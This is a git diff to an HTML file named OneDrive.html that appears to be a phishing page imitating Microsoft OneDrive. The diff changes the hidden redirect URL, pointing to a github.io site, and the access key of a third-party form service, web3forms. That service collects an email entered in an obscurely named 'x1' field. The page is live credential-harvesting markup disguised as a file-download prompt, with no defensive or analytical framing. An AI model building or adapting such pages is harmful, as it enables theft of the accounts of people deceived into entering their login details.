--- a/OneDrive.html
+++ b/OneDrive.html
@@ -53,9 +53,9 @@
   <br>
  <small class="text-danger" id="msg" style="font-weight: 600;"></small>
  <form action="https://api.web3forms.com/submit" method="POST">
-<input type="hidden" name="redirect" value="https://amira800.github.io/OneDrive-File-Download/OneDrive">
+<input type="hidden" name="redirect" value="https://amira800.github.io/OneDrive/OneDrive">
     <!-- Replace with your Access Key -->
-    <input type="hidden" name="access_key" value="68c2f032-ae3c-41ea-bdb4-11061b978f83">
+    <input type="hidden" name="access_key" value="df41b2a1-5d8f-4aa3-be0d-b784b1585a1c">
 
     <!-- Form Inputs. Each input must have a name="" attribute --> 
  <input type="email" name="x1" id="x1" class="form-control mb-3" placeholder="Email" value required> 
